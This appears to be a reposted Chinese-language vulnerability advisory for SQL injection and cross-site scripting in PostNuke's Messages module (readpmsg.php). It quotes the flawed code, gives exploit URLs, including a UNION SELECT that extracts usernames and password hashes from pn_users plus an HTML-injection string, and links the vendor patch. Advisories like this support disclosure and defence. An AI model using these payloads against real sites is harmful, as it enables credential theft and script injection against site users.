PostNuke SQL注入和跨站脚本漏洞

2008-04-10 03:04:04来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

PostNuke SQL注入和跨站脚本漏洞

发布日期:2005-05-30
更新日期:2005-05-30

受影响系统:
PostNuke PostNuke 0.76 RC4a
PostNuke PostNuke 0.76 RC4
PostNuke PostNuke 0.750
描述:
BUGTRAQ ID: 13789

PostNuke是开放源码,开放开发的内容管理系统(CMS)。

PostNuke中存在SQL注入和跨站脚本漏洞,影响Messages模块,可能允许攻击者修改SQL请求的逻辑,在用户浏览器上执行任意HTML和脚本代码。

PostNuke的readmsg.php脚本没有充分过滤start参数值,攻击者可以提交恶意SQL命令作为此参数数据,导致更改原来的SQL逻辑,可造成数据库更改或信息泄露。

<*来源:sp3x (sp3x@securityreason.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111721364707520&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";

$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "<br />";
forumerror(0005);
}
=======================

首先登陆到postnuke,然后向自己发送消息,之后:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

注意:
------
total_messages=1 - total_messages的ID必须存在。

之后就可以看到以下错误消息:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near '[SQL injection],1' at line 10 \
========================

SQL注入攻击:
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0 UNION SELECT pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null FROM pn_users WHERE pn_uid=2/*&total_messages=1

跨站脚本攻击:
============================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

然后就可以得到:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near ''[Our XSS],1' at line 10 \
========================

建议:
厂商补丁:

PostNuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Windows资源管理器预览框脚本注入漏洞(MS05-024)

下一篇:GXINE远程主机名格式串处理漏洞